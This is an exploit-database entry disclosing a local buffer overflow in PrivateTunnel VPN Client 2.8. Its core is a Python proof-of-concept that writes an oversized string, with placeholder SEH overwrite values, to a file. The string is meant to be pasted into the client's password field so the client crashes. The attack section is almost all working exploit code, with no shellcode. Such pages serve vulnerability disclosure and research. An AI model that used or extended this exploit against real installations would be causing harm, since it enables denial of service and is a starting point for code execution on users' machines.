PrivateTunnel Client 2.8 - Local Buffer Overflow

2017.04.26
Credit: Muhann4d
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # Exploit Title : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH) # Date : 25/04/2017 # Exploit Author : Muhann4d # Vendor Homepage : https://www.privatetunnel.com # Software Link : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe # Affected Versions : 2.8 & 2.7 # Category : Denial of Service (DoS) Local # Tested on OS : Windows 7 SP1 32bit 64bit # Proof of Concept : run the exploit, copy the contents of poc.txt, paste it in the password field and press Login. junkA = "\x41" * 1996 nSEH = "\x42" * 4 SEH = "\x43" * 4 junkD = "\x44" * 9000 f = open ("poc.txt", "w") f.write(junkA + nSEH + SEH + junkD) f.close()

References:

https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top